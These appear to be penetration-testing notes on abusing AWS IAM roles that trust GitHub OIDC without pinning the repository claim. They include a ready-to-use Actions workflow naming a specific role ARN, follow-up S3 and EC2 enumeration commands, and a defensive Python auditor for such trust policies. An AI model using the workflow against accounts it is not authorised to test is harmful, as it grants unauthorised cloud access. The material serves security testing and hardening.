Assuming a Vulnerable GitHub OIDC Trust Role

Run the aws-oidc-tester.py Tool
- Use the aws-oidc-tester.py script to identify vulnerable roles configured for GitHub OpenID Connect (OIDC) trust.

```bash
python3 aws-oidc-tester.py
```

Use GitHub to Assume the Vulnerable Role
- Create a GitHub repository and specify a workflow file .github/workflows/aws.yml with the appropriate configuration to leverage the vulnerable role.

```yaml
name: Test workflow
on:
  push:
    branches:
      - main # You can specify other branches if needed
permissions:
  id-token: write # Required to request the OIDC token
  contents: read # Optional, allows reading repository contents
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v3
        with:
          role-to-assume: arn:aws:iam::741448947753:role/github # Replace with your IAM role ARN
          role-session-name: test
          aws-region: us-east-1
      - name: AWS command
        run: |
          aws sts get-caller-identity
```

Run Commands as the Assumed Role
- Use the assumed role credentials from the GitHub Actions workflow to execute any desired AWS commands.
- Example:

```bash
aws s3 ls
aws ec2 describe-instances
```
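The misconfiguration the steps above rely on is a role trust policy that accepts the GitHub OIDC provider without pinning the token's `sub` claim to a specific repository. The following is an added defender-side example (not part of these notes or of aws-oidc-tester.py) that audits a trust policy document for exactly that pattern; the account id, organisation and repository names in the sample policies are placeholders.

```python
# Added example: audit an IAM role trust policy document for the GitHub OIDC
# misconfiguration. A role is assumable from ANY GitHub repository when its trust
# policy accepts the GitHub OIDC provider without restricting the "sub" claim
# (or restricts it only to a wildcard).
GITHUB_OIDC = "token.actions.githubusercontent.com"

def _as_list(v):
    return v if isinstance(v, list) else [v]

def audit_github_oidc_trust(policy: dict) -> list:
    """Return findings (strings) for Allow statements that trust the GitHub OIDC provider."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement", []))):
        principal = stmt.get("Principal", {})
        federated = _as_list(principal.get("Federated", [])) if isinstance(principal, dict) else []
        if stmt.get("Effect") != "Allow" or not any(GITHUB_OIDC in p for p in federated):
            continue
        # Flatten every condition operator into one claim -> [values] map (keys are case-insensitive).
        claims = {}
        for kv in stmt.get("Condition", {}).values():
            for key, val in kv.items():
                claims.setdefault(key.lower(), []).extend(_as_list(val))
        subs = claims.get(f"{GITHUB_OIDC}:sub", [])
        if f"{GITHUB_OIDC}:aud" not in claims:
            findings.append(f"stmt {i}: no aud condition (expected sts.amazonaws.com)")
        if not subs:
            findings.append(f"stmt {i}: no sub condition; any GitHub repository can assume this role")
        elif any(s == "*" or s.startswith("repo:*") for s in subs):
            findings.append(f"stmt {i}: sub is a wildcard {subs}; any GitHub repository can assume this role")
    return findings

def _gh_trust_policy(condition: dict) -> dict:
    """Build a trust policy for the GitHub OIDC provider (constructed sample; account id is a placeholder)."""
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": f"arn:aws:iam::111111111111:oidc-provider/{GITHUB_OIDC}"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": condition,
    }]}

# Constructed sample: only the audience is pinned, which is the vulnerable pattern.
VULNERABLE_TRUST = _gh_trust_policy({"StringEquals": {f"{GITHUB_OIDC}:aud": "sts.amazonaws.com"}})
# Constructed sample: hardened policy pinned to one repository and branch (placeholder org/repo).
HARDENED_TRUST = _gh_trust_policy({
    "StringEquals": {f"{GITHUB_OIDC}:aud": "sts.amazonaws.com"},
    "StringLike": {f"{GITHUB_OIDC}:sub": "repo:example-org/example-repo:ref:refs/heads/main"},
})
```

Feed it the `AssumeRolePolicyDocument` of each role from `aws iam list-roles` to find roles that the workflow above could assume from an arbitrary repository.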